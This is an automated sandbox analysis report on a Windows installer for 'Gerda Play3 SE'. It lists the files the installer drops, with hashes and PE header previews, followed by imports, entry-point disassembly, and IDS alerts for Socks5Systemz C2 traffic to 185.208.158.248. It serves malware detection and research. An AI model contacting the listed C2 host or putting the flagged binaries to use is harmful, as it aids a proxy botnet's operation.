                                                                                Category:dropped
                                                                                Size (bytes):499712
                                                                                Entropy (8bit):6.414789978441117
                                                                                Encrypted:false
                                                                                SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):348160
                                                                                Entropy (8bit):6.542655141037356
                                                                                Encrypted:false
                                                                                SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):392048
                                                                                Entropy (8bit):6.542831007177094
                                                                                Encrypted:false
                                                                                SSDEEP:6144:1eIwnft+S34NVSTjMFR+oVbKQfbno1/1oz6i2EDSD4I+XdtQXGMiFcoOjAWcIhbl:1eIwnft+S34NVSTQD+oVbKQfrC/1ct25
                                                                                MD5:EE856A00410ECED8CC609936D01F954E
                                                                                SHA1:705D378626AEC86FECFDF04C86244006BC3AF431
                                                                                SHA-256:B6192300D3C1476EF3C25A368D055AA401035E78F9F6DBE5F93C84D36EF1FA62
                                                                                SHA-512:666D731247DAEAE4B57925DFA8CAE845327FD34E0F6B9AAD1BCF471D1800D7E8AF5642A5FB6E0EC58BA3AC7DD98A6D3FE0B473F34C16FFB9985621C98C0463EF
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../.v[N.%[N.%[N.%4*.$QN.%4*.$.N.%4*.$IN.%4*.$YN.%.*.$HN.%.*.$GN.%.*.$KN.%.*.$XN.%[N.%.O.%.*.$iN.%.*.$ZN.%.*e%ZN.%.*.$ZN.%Rich[N.%........PE..L...D.r^...........!.....8..........^7.......P......................................'.....@..........................6..<)..L_..<.......X...............p3.......3..@,..............................`,..@............P...............................text....7.......8.................. ..`.rdata..l....P.......<..............@..@.data....?...p...6...X..............@....rsrc...X...........................@..@.reloc...3.......4..................@..B................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):720033
                                                                                Entropy (8bit):6.5224444313039385
                                                                                Encrypted:false
                                                                                SSDEEP:12288:sQCCh1TaLSSKrPD37zzH2A6QGgx/nstpq9KgER19zrNidbdgUHayxyF8:sQPh1eLSSKrPD37zzH2A6QD/srqggEvM
                                                                                MD5:5F71B93A871D20C35B2FBB12D7447BEC
                                                                                SHA1:6AF9BEBF92398CA43B717302F5D0F01301DD6A21
                                                                                SHA-256:DE828915CAF8D3BFD7933018C6D5A1C2B510396EB198589244AF3EA8CAC83B0B
                                                                                SHA-512:DBA35ED038DB56F96C4EE43C203DA527F4A4D9A58A5B8C6B19087BDD7C32BF7D5B553BEB1A2AFEFE7EF5165E3C99B99A9D4D6B16CB8239707BD67C7F06C306FC
                                                                                Malicious:true
                                                                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@...............................%........................................................... ......................................................CODE............................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata....... ......................@..P.reloc..H....0......................@..P.rsrc...............................@..P.....................\..............@..P........................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
                                                                                File Type:InnoSetup Log Gerda Play3 SE, version 0x30, 4476 bytes, 767668\user, "C:\Users\user\AppData\Local\Gerda Play3 SE"
                                                                                Category:dropped
                                                                                Size (bytes):4476
                                                                                Entropy (8bit):4.60908228428025
                                                                                Encrypted:false
                                                                                SSDEEP:96:k8Wfjv88kp/hIK9X+eOIhSv4cVSQs0LCYy:k8Wfb8vp/hyHIhxcVSQ1g
                                                                                MD5:484690B99869DD2BE827F831C6B05E9C
                                                                                SHA1:E90698F781ABA11ADFC40D24DF4633DD6B241E35
                                                                                SHA-256:A5F1ABFFBF2230997603713E5B2415FCA8B54A30568430BE7196B8A0369F2126
                                                                                SHA-512:2C7DA88CA56AB35C0A7F547AF959FD329A3330D6AE8E0FA6C44737F917C7D6D6E9E78EC8EDAE03FDCB6D00B6E90C4DDEEDAA2EA6967451B3DA116605E8723143
                                                                                Malicious:false
                                                                                Preview:Inno Setup Uninstall Log (b)....................................Gerda Play3 SE..................................................................................................................Gerda Play3 SE..................................................................................................................0.......|...%......................................................................................................................O....@y|......Q....767668.user.C:\Users\user\AppData\Local\Gerda Play3 SE.............9.... .....M......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User3
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):720033
                                                                                Entropy (8bit):6.5224444313039385
                                                                                Encrypted:false
                                                                                SSDEEP:12288:sQCCh1TaLSSKrPD37zzH2A6QGgx/nstpq9KgER19zrNidbdgUHayxyF8:sQPh1eLSSKrPD37zzH2A6QD/srqggEvM
                                                                                MD5:5F71B93A871D20C35B2FBB12D7447BEC
                                                                                SHA1:6AF9BEBF92398CA43B717302F5D0F01301DD6A21
                                                                                SHA-256:DE828915CAF8D3BFD7933018C6D5A1C2B510396EB198589244AF3EA8CAC83B0B
                                                                                SHA-512:DBA35ED038DB56F96C4EE43C203DA527F4A4D9A58A5B8C6B19087BDD7C32BF7D5B553BEB1A2AFEFE7EF5165E3C99B99A9D4D6B16CB8239707BD67C7F06C306FC
                                                                                Malicious:true
                                                                                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@...............................%........................................................... ......................................................CODE............................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata....... ......................@..P.reloc..H....0......................@..P.rsrc...............................@..P.....................\..............@..P........................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):2560
                                                                                Entropy (8bit):2.8818118453929262
                                                                                Encrypted:false
                                                                                SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                MD5:A69559718AB506675E907FE49DEB71E9
                                                                                SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):6144
                                                                                Entropy (8bit):4.720366600008286
                                                                                Encrypted:false
                                                                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):23312
                                                                                Entropy (8bit):4.596242908851566
                                                                                Encrypted:false
                                                                                SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                Malicious:false
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):708608
                                                                                Entropy (8bit):6.514146996529036
                                                                                Encrypted:false
                                                                                SSDEEP:12288:UQCCh1TaLSSKrPD37zzH2A6QGgx/nstpq9KgER19zrNidbdgUHayxyF:UQPh1eLSSKrPD37zzH2A6QD/srqggEvX
                                                                                MD5:499BD324F6DD0DF600B61BE36E26B612
                                                                                SHA1:4DAD284AE727350A0632B3AAB09D6EB7B9D3EC1D
                                                                                SHA-256:6F53CD1CF8A75A30ECA24BFCFE2B2F0890C3545F20A6F56356C2272A66BEE7A5
                                                                                SHA-512:92E83A502CE167873AD80A8A5EE61C40CB64B649E3CA13CEF779FE329D647BBB40B6ECD788C77B05B9AB092C38D3F9B5ADCA2F813F03F90F41FD89AFB48D4888
                                                                                Malicious:true
                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@...............................%........................................................... ......................................................CODE............................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata....... ......................@..P.reloc..H....0......................@..P.rsrc...............................@..P.....................\..............@..P........................................................................................................................................
                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):7.997607003853171
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 98.73%
                                                                                • Inno Setup installer (109748/4) 1.08%
                                                                                • Windows Screen Saver (13104/52) 0.13%
                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                File name:file.exe
                                                                                File size:3'298'104 bytes
                                                                                MD5:5f3d49bffed0da5d969582bd92fed715
                                                                                SHA1:6efbd680de90af1c2ac13eb1a781b3797f6714e4
                                                                                SHA256:a166a398a327a98b73d33c3ffd0ae68ae1538a79678e4e16c5977aadfa46a395
                                                                                SHA512:a3c277033c4942f6c78afa49a40f4b1a1751e7b814bde4d0bdd544dd0582010f1f77fead16cc3918eb12b8a08eb96e86e1d82be0af882ad8f34ebb8b5e7cada3
                                                                                SSDEEP:49152:e9qpl6w2Sh0/GmssmPSXQn9OjbM2u/o44rrp4F6BV6Lx45VRK7FeAir:4ml6Qh0/XUPSgFFSK6qq5VRaFKr
                                                                                TLSH:9AE53302EFFA0439F932C7B44900724394652F0D0FE19ED7A2EEA94A4EF79254939767
                                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                Icon Hash:2d2e3797b32b2b99
                                                                                Entrypoint:0x40a5f8
                                                                                Entrypoint Section:CODE
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:1
                                                                                OS Version Minor:0
                                                                                File Version Major:1
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:1
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:884310b1928934402ea6fec1dbd3cf5e
                                                                                Instruction
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                add esp, FFFFFFC4h
                                                                                push ebx
                                                                                push esi
                                                                                push edi
                                                                                xor eax, eax
                                                                                mov dword ptr [ebp-10h], eax
                                                                                mov dword ptr [ebp-24h], eax
                                                                                call 00007F636481E483h
                                                                                call 00007F636481F68Ah
                                                                                call 00007F636481F919h
                                                                                call 00007F636481F9BCh
                                                                                call 00007F636482195Bh
                                                                                call 00007F63648242C6h
                                                                                call 00007F636482442Dh
                                                                                xor eax, eax
                                                                                push ebp
                                                                                push 0040ACC9h
                                                                                push dword ptr fs:[eax]
                                                                                mov dword ptr fs:[eax], esp
                                                                                xor edx, edx
                                                                                push ebp
                                                                                push 0040AC92h
                                                                                push dword ptr fs:[edx]
                                                                                mov dword ptr fs:[edx], esp
                                                                                mov eax, dword ptr [0040C014h]
                                                                                call 00007F6364824EDBh
                                                                                call 00007F6364824AC6h
                                                                                cmp byte ptr [0040B234h], 00000000h
                                                                                je 00007F63648259BEh
                                                                                call 00007F6364824FD8h
                                                                                xor eax, eax
                                                                                call 00007F636481F179h
                                                                                lea edx, dword ptr [ebp-10h]
                                                                                xor eax, eax
                                                                                call 00007F6364821F6Bh
                                                                                mov edx, dword ptr [ebp-10h]
                                                                                mov eax, 0040CE2Ch
                                                                                call 00007F636481E51Ah
                                                                                push 00000002h
                                                                                push 00000000h
                                                                                push 00000001h
                                                                                mov ecx, dword ptr [0040CE2Ch]
                                                                                mov dl, 01h
                                                                                mov eax, 0040738Ch
                                                                                call 00007F63648227FAh
                                                                                mov dword ptr [0040CE30h], eax
                                                                                xor edx, edx
                                                                                push ebp
                                                                                push 0040AC4Ah
                                                                                push dword ptr fs:[edx]
                                                                                mov dword ptr fs:[edx], esp
                                                                                call 00007F6364824F36h
                                                                                mov dword ptr [0040CE38h], eax
                                                                                mov eax, dword ptr [0040CE38h]
                                                                                cmp dword ptr [eax+0Ch], 00000000h
                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                CODE0x10000x9d300x9e0004ffdb46e50716ec8cb7db42819802fdFalse0.6052956882911392data6.631603395825714IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                DATA0xb0000x2500x400beee52f18301950f82460d9ffe5aec7eFalse0.306640625data2.7547169534996403IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                BSS0xc0000xe900x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                .reloc0x100000x8c40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                .rsrc0x110000x2c000x2c005305601982e1fdf0c6302dfb1a01e5a8False0.3340731534090909data4.593307861189122IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                                RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                                RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                                RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                                RT_STRING0x125740x2f2data0.35543766578249336
                                                                                RT_STRING0x128680x30cdata0.3871794871794872
                                                                                RT_STRING0x12b740x2cedata0.42618384401114207
                                                                                RT_STRING0x12e440x68data0.75
                                                                                RT_STRING0x12eac0xb4data0.6277777777777778
                                                                                RT_STRING0x12f600xaedata0.5344827586206896
                                                                                RT_RCDATA0x130100x2cdata1.1818181818181819
                                                                                RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                                                RT_VERSION0x1307c0x4f4dataEnglishUnited States0.28470031545741326
                                                                                RT_MANIFEST0x135700x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924
                                                                                DLLImport
                                                                                kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                                                user32.dllMessageBoxA
                                                                                oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                                                kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                                user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                                                comctl32.dllInitCommonControls
                                                                                advapi32.dllAdjustTokenPrivileges
                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                DutchNetherlands
                                                                                EnglishUnited States
                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-09-27T17:31:53.456689+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657519185.208.158.24880TCP
                                                                                2024-09-27T17:31:56.349470+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657519185.208.158.24880TCP
                                                                                2024-09-27T17:31:56.885180+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657519185.208.158.24880TCP
                                                                                2024-09-27T17:31:58.025467+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657522185.208.158.24880TCP
                                                                                2024-09-27T17:31:59.024528+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657523185.208.158.24880TCP
                                                                                2024-09-27T17:31:59.852769+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657524185.208.158.24880TCP
                                                                                2024-09-27T17:32:00.689985+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657526185.208.158.24880TCP
                                                                                2024-09-27T17:32:01.039539+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657526185.208.158.24880TCP
                                                                                2024-09-27T17:32:01.393119+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657526185.208.158.24880TCP
                                                                                2024-09-27T17:32:01.913473+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657526185.208.158.24880TCP
                                                                                2024-09-27T17:32:02.267509+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657526185.208.158.24880TCP
                                                                                2024-09-27T17:32:03.067039+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657527185.208.158.24880TCP
                                                                                2024-09-27T17:32:03.418240+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657527185.208.158.24880TCP
                                                                                2024-09-27T17:32:04.272954+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657528185.208.158.24880TCP
                                                                                2024-09-27T17:32:05.215372+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657529185.208.158.24880TCP
                                                                                2024-09-27T17:32:06.018644+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657530185.208.158.24880TCP
                                                                                2024-09-27T17:32:06.373694+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657530185.208.158.24880TCP
                                                                                2024-09-27T17:32:07.205985+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657531185.208.158.24880TCP
                                                                                2024-09-27T17:32:08.108983+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657532185.208.158.24880TCP
                                                                                2024-09-27T17:32:08.923277+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657533185.208.158.24880TCP
                                                                                2024-09-27T17:32:09.753087+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657534185.208.158.24880TCP
                                                                                2024-09-27T17:32:10.885803+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657535185.208.158.24880TCP
                                                                                2024-09-27T17:32:11.795330+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657536185.208.158.24880TCP
                                                                                2024-09-27T17:32:12.695074+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657537185.208.158.24880TCP
                                                                                2024-09-27T17:32:13.253377+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657537185.208.158.24880TCP
                                                                                2024-09-27T17:32:14.187113+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657538185.208.158.24880TCP
                                                                                2024-09-27T17:32:15.019151+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657539185.208.158.24880TCP
                                                                                2024-09-27T17:32:15.855427+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657540185.208.158.24880TCP
                                                                                2024-09-27T17:32:16.706911+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657541185.208.158.24880TCP
                                                                                2024-09-27T17:32:17.056712+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657541185.208.158.24880TCP
                                                                                2024-09-27T17:32:17.927819+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.657543185.208.158.24880TCP
